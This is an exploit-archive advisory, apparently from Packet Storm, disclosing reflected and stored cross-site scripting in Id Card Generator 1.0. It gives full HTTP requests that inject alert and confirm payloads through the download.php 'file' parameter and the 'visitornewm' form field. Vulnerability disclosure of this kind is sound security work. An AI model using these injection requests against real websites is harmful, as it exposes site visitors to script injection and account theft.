Id Card Generator 1.0 Cross Site Scripting

Id Card Generator 1.0 Cross Site Scripting: Posted Mar 28, 2021; Authored by Richard Jones; Id Card Generator version 1.0 suffers from multiple cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 666e78b300e1a151c8982d3f2431665678bd06e5c082424c6516b72d0161988b; Download | Favorite | View

Id Card Generator 1.0 Cross Site Scripting

# Exploit Title: Id Card Generator | Cross Site Scripting 'download.php'
# Exploit Author: Richard Jones
# Date: 2021-03-28
# Vendor Homepage: https://www.sourcecodester.com/php/12040/id-generator-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12040&title=ID+Generator+in+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

GET /id-card/download.php?file=%22%3E%3Cimg%20src=x%20onerror=%22confirm(%27XSS%27)%22%3E HTTP/1.1

Host: TARGET

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://TARGET/id-card/download.php?file=%22%3E%3Cimg%20src=x%20onerror=%22confirm(%27XSS%27)%22%3E

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0


## Payload: "><img src=x onerror="confirm('XSS')">

-------

# Exploit Title: Id Card Generator | Cross Site Scripting 
# Exploit Author: Richard Jones
# Date: 2021-03-28
# Vendor Homepage: https://www.sourcecodester.com/php/12040/id-generator-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12040&title=ID+Generator+in+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

POST /id-card/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11277759132085478021703975389
Content-Length: 466
Origin: http://localhost
Connection: close
Referer: http://localhost/id-card/
Upgrade-Insecure-Requests: 1

-----------------------------11277759132085478021703975389
Content-Disposition: form-data; name="visitornewm"

hello"><script>alert(`xss`)</script>
-----------------------------11277759132085478021703975389
Content-Disposition: form-data; name="dateinput"

March 03, 2021
-----------------------------11277759132085478021703975389
Content-Disposition: form-data; name="process"

Generate ID
-----------------------------11277759132085478021703975389--

Top Authors In Last 30 Days

Red Hat 328 files
Ubuntu 56 files
Gentoo 32 files
Debian 24 files
Apple 9 files
malvuln 6 files
nu11secur1ty 5 files
Google Security Research 4 files
Jann Horn 4 files
Adam Gowdiak 4 files

File Archives

Systems

AIX (429)
Apple (2,088)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,047)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,790)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,914)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,521)
UNIX (9,404)
UnixWare (187)
Windows (6,660)
Other

Id Card Generator 1.0 Cross Site Scripting

Id Card Generator 1.0 Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Id Card Generator 1.0 Cross Site Scripting

Share This

Id Card Generator 1.0 Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems